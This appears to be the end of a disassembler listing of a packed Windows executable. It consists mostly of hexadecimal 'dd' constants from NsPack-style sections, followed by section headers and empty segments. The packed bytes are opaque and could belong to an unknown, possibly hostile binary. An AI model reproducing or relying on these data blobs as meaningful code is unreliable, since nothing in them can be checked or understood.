dd 0FEE392Ch, 558B8435h, 1FF0B514h, 9D0707FFh, 0F8912BC0h
dd 9C1448Dh, 39F4F943h, 1338AD3h, 4A31FF33h, 4AE91288h
dd 0B058A4CEh, 75184622h, 0EC48C305h, 2B2B27EBh, 0E80A8AC8h
dd 0F0E1182Eh, 76BA09EBh, 87E410E4h, 0EC1D38B5h, 0EDB419B6h
dd 0A2E613A8h, 8E8481DDh, 32480A68h, 0C2D5AA9Bh, 91EA6299h
dd 0E0DC487Eh, 0BD9E7FDh, 0C2ADE911h, 0F06C8944h, 0DBE41C5Bh
dd 9D6D0CD1h, 2C591284h, 6648888h, 0A113229h, 9750E81Bh
dd 2404F8D9h, 34C7CB4h, 0D858247Dh, 3DF25194h, 81062407h
dd 4B536093h, 549E7414h, 49647C21h, 0D6C7D1E2h, 4AFB2391h
dd 0BA30CFF9h, 0CC3E98CAh, 7D5D0E2Ah, 0E4511524h, 5EF02B1Dh
dd 80055E4Eh, 5DD73AE8h, 21EB7001h, 0E1E7C283h, 18A4FB0Fh
dd 1C00493Eh, 6A50C845h, 44F691F1h, 0DBEB5A0Ah, 8590B4CEh
dd 0D36284B6h, 648838Eh, 303424C9h, 9E3C80A6h, 393F3A77h
dd 0D3C1A41Ch, 342429Ch, 40188AC7h, 9413940h, 0D2854A40h
dd 57EC2A1h, 7220D43Bh, 78F1EC49h, 820FE0E7h, 45B59055h
dd 83CC95D2h, 0D2851C6Eh, 7841EB75h, 63F0D1C3h, 72102E12h
dd 800F8A87h, 0BB82E144h, 0F4D1610Dh, 62720124h, 96E94407h
dd 55E3194Ah, 2E2D2E2Ch, 72805F2Eh, 8AE43214h, 2EB37DC1h
dd 0AAC1F3F6h, 0C807C8Fh, 0FA7548D3h, 12BA093Ch, 1CF71CA6h
dd 16F781FCh, 0F11EC9F5h, 0BB060682h, 0E35061C6h, 10E068CFh
dd 9C268D92h, 5341A71Bh, 9D71FF52h, 0BD2077CDh, 0A17A90C8h
dd 1494D38Bh, 206FB405h, 57885272h, 1DFC12B8h, 33242065h
dd 18CE4F6h, 81806E46h, 2E69C36Ah, 8B020240h, 5FC385C6h
dd 53F8C41Eh, 80B901h, 0
dd 2000005Dh, 17C5200h, 6E00000h, 6F000000h, 0A3FFFFFDh
dd 3E47FFB7h, 39721548h, 92B85161h, 86A3E628h, 0E4EEF907h
dd 2FD3821Eh, 13C3AC5h, 0C97EB14Bh, 2F4D8A8Ah, 7FD90DA3h
dd 238CE3A6h, 59E05311h, 8A75C518h, 0B6F877E2h, 6A0C7F94h
dd 4974DEC0h, 5CE9E264h, 0D804B253h, 0AB0C44F7h, 466D0D5Fh
dd 76C3E5E9h, 5796B788h, 0E14DB6ACh, 0FB6F1D69h, 6C10884Bh
dd 3F88CB42h, 0F35005Ch, 38A4B450h, 505F368Ah, 4F612308h
dd 84FFF63Dh, 80A6EB53h, 0A00991E4h, 6F702968h, 0CB2C440Ch
dd 9390F289h, 11D0854Bh, 51E0DEAFh, 0FDF77AF2h, 4E078AA2h
dd 811643D2h, 0EE0F62B6h, 94D36E75h, 0E23805A1h, 1E8A612h
dd 0C087E8D3h, 0DDEFBBE3h, 2B5E8F24h, 283B5C9h, 7894802Eh
dd 0C07DB02h, 2F6BB8FFh, 0E01B6F3Eh, 0B2464AEFh, 0B146CCEAh
dd 8B1D9AF9h, 0F3B8A24Bh, 0EE9F0A77h, 0D1DF915Dh, 1D37EE47h
dd 0BE4B3D82h, 0AB8F6810h, 1F2E48C6h, 97BECF79h, 50E6D781h
dd 79CB5716h, 0DD686B6Ch, 0FC08F7ADh, 895A672Fh, 4AAC4654h
dd 0C82BCFABh, 0FA3092DBh, 4AEA9B2Dh, 6A3C44E5h, 8ADAED01h
dd 6DA3F0B1h, 9D9E2B53h, 0B30A67D6h, 0AF1D690h, 4154B55Ch
dd 4662341Ch, 0D1FDBDBDh, 86D396C2h, 0CB522DE0h, 0AED96C65h
dd 0EB825C07h, 42AE0ABEh, 7E215B10h, 3B3A768Fh, 0C72A5F31h
dd 0AB681B6Ch, 9AE7A192h, 5E30A637h, 47BA39A4h, 2A4241EFh
dd 5C7F542Fh, 34C37C6Fh, 79C9C090h, 7162E0DBh, 0B8E90F18h
dd 552AB40h, 17C9CEF5h, 0F8E215D3h, 0BC1D07DFh, 0A25FEFDDh
dd 65A9B274h, 6C584910h, 0C0AAF869h, 39324C21h, 0C72D754Fh
dd 0FA9D1E54h, 1A870AD0h, 9776F907h, 0FF8DFBA2h, 0F9984112h
dd 0E1041F88h, 5523E3F6h, 0CB83419Ch, 42F6C1DBh, 5701F961h
dd 9A85E9C3h, 72F13E23h, 0ADEDD1D9h, 30C376BFh, 289A5492h
dd 0B99A705h, 0D62DEE46h, 0BFEF2274h, 25B20072h, 0F5C92B3Ch
dd 1B2B3B43h, 0E2F54864h, 6B576A1Eh, 20A92D24h, 0B3BF2D83h
dd 2FC28325h, 0DC5AB8D3h, 214C25ACh, 3D04FF45h, 14CC0C54h
dd 7EB64E46h, 90A3979Bh, 0A4A36940h, 30124D7h, 459E051Ah
dd 490FF85Eh, 8F082EF3h, 0EC2E11E9h, 9B620719h, 0F720EB44h
dd 1ED46268h, 66DD8E67h, 45070E79h, 574B32A9h, 0B08993F7h
dd 416B4B22h, 48EBD85Eh, 0AA8860C6h, 12302DC4h, 0CB3A0FC5h
dd 0E429DFECh, 2BB17841h, 0E5ADC919h, 8D9BCF77h, 3AA2948h
dd 50874D6Eh, 2BD6FC31h, 0A020184Dh, 0E152A11Eh, 70E5DAFEh
dd 0E499C78Fh, 7A2A7402h, 0FCC1FED1h, 5AD7F6F1h, 9125625Dh
dd 59792489h, 8E14B3C1h, 0C281CF30h, 13BD8C56h, 817A21FFh
dd 0F27D2AE8h, 0B201AE42h, 0EECE6190h, 7D75D60Ah, 5057BEFEh
dd 4DE3ADF8h, 55165B2Bh, 0E47C4AB4h, 9FB5A487h, 5526992h
dd 45DD8B3Ah, 0FF854947h, 59BA5A9Eh, 0BC33748h, 0E6608A20h
dd 0AE634197h, 0D19CAECEh, 0C37B1F50h, 0BD216EA6h, 530B8BB2h
dd 5B4B35B6h, 0DDC16E1Ah, 0E39C65A0h, 9FF45F1Ah, 1980622Ah
dd 374CE99Dh, 9F775046h, 9F4D0D8Bh, 5D97E2DDh, 0A8BDD0A0h
dd 3839C4Ch, 514BD75Ch, 58BD209Bh, 0F86AD79Dh, 2FAB3C20h
dd 0DDEA2ADAh, 9D5AF649h, 98054836h, 2CA38116h, 750BCAC4h
dd 0D3C339DAh, 5CB2D33Eh, 0F131DB40h, 543D4B03h, 45EAE853h
dd 8115DA71h, 2B70CF9Dh, 76CD3D74h, 89251E3Bh, 69ECDDA9h
dd 0B6A74C73h, 2D7CCA8h, 64A93FA5h, 7231AD2Bh, 317C07FBh
dd 2DBDFF15h, 7146DB68h, 0B5C46A8Dh, 2701A644h, 0ED6E7226h
dd 0D6A4EAFBh, 66117C7Bh, 3CAF916Dh, 0FA500EA1h, 0E8C976FDh
dd 0C7F33092h, 90AF8D3h, 2E7601Fh, 44FE6004h, 33A9038Bh
dd 0D6D588D0h, 7CD08816h, 0CA623D43h, 53973742h, 2E5688A0h
dd 913EE11Ch, 543CB104h, 1EC8FACDh, 746C456Fh, 2D68D019h
dd 7265507Ch, 1E79D8F0h, 0F0EA1491h, 0E2DD58BBh, 0D48A9BC1h
dd 637A5BF2h, 9D90218h, 1429E57Ah, 3748F085h, 72023793h
dd 0EA5D74Bh, 0CEEB93Ah, 0B6E563D2h, 3B4267D9h, 0F2BA995Dh
dd 70A34259h, 0F0F6140Bh, 0AF01349h, 23453E6Ah, 0A8A6AB9Eh
dd 89A70E50h, 1510797Ah, 0AE82AF7Fh, 0AF51C9E9h, 56A9016Bh
dd 77A642B5h, 2CB74A64h, 6E46B95Bh, 0A753B4Eh, 79AB2EECh
dd 0CF4A97FDh, 93A7AEC6h, 5009270Ch, 0E612A08Fh, 77D247CBh
dd 3FA3DC92h, 0F00EFE78h, 0E7193EE2h, 29E67D38h, 5904BD30h
dd 0B62A523Fh, 339AC447h, 7127E71h, 0FECE908Dh, 361181C6h
dd 5EE4BAC0h, 0AB50C5DEh, 91955602h, 9E254693h, 0C54E11Fh
dd 6A1AD3F9h, 8A52C0B4h, 0B324C8C2h, 55D547BCh, 3E9A5D98h
dd 4A40618Ch, 0E137D001h, 0E01B10h, 82B3854Ch, 2AD57C4Ah
dd 0EEA7EF38h, 25644980h, 6A34E870h, 4C745469h, 2C77BA65h
dd 23F53EB1h, 0BFF49E69h, 4453083Ah, 0BFB18176h, 5BA3C154h
dd 6D05147Eh, 32888C24h, 0C84FA7DEh, 8B921EDh, 80274B37h
dd 82AC9523h, 396E2D0Eh, 0D1CDC99Dh, 0AC0A3ABFh, 680BF3D0h
dd 0B7C68BF6h, 44AF975h, 24184E96h, 0A556C08Fh, 0E22B55C3h
dd 0EF950F76h, 6F36A37Eh, 378AC10Bh, 0C3945D90h, 0A45CEF3Bh
dd 0C08D92Bh, 0D38675DEh, 0A7B40E7Ch, 0F61EE6B0h, 2282184Ch
dd 0F0FCC526h, 98181F7Fh, 51BBC1A9h, 0C263C78Bh, 61789DCAh
dd 0FE5E00CAh, 66A4CA94h, 0B574D5F6h, 0B746D8F4h, 2D8FCC41h
dd 8142A18Bh, 5A9C4FBBh, 0A79AFB19h, 4792159Dh, 35451E03h
dd 92A19AC6h, 81DDCC63h, 7F870671h, 4FDE9432h, 4B608524h
dd 6D8C74BBh, 70ABE4AFh, 1B0292B5h, 685162Dh, 0FEE568Bh
dd 1033AEB5h, 55B9B8B7h, 915F3F88h, 89C67492h, 943DBB87h
dd 1A49062Eh, 0E8E16F42h, 91E06E8Fh, 0A98E16C8h, 0F5A9C91h
dd 5E374AEh, 0DB923D0Bh, 2FE401A8h, 34521A58h, 1E389E41h
dd 8CD49A0Ch, 5BC5B828h, 9CAB23BFh, 4EE34F98h, 0F9B918B4h
dd 4D6DDDEDh, 0F5C55B1Dh, 0EB696EEEh, 6933B595h, 47A64ACDh
dd 0F718439Eh, 758910DAh, 9F288CD5h, 5FC2h dup(0)
_nsp1 ends
; Section 3. (virtual address 00088000)
; Virtual size : 00000A3B ( 2619.)
; Section size in file : 00000A3B ( 2619.)
; Offset to raw data for section: 00088000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_nsp2 segment para public 'CODE' use32
assume cs:_nsp2
;org 488000h
assume es:nothing, ss:nothing, ds:_nsp0, fs:nothing, gs:nothing
dd 28Eh dup(0)
db 3 dup(0)
_nsp2 ends
; Section 4. (virtual address 00089000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00088C00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 489000h
align 2000h
_idata2 ends
end start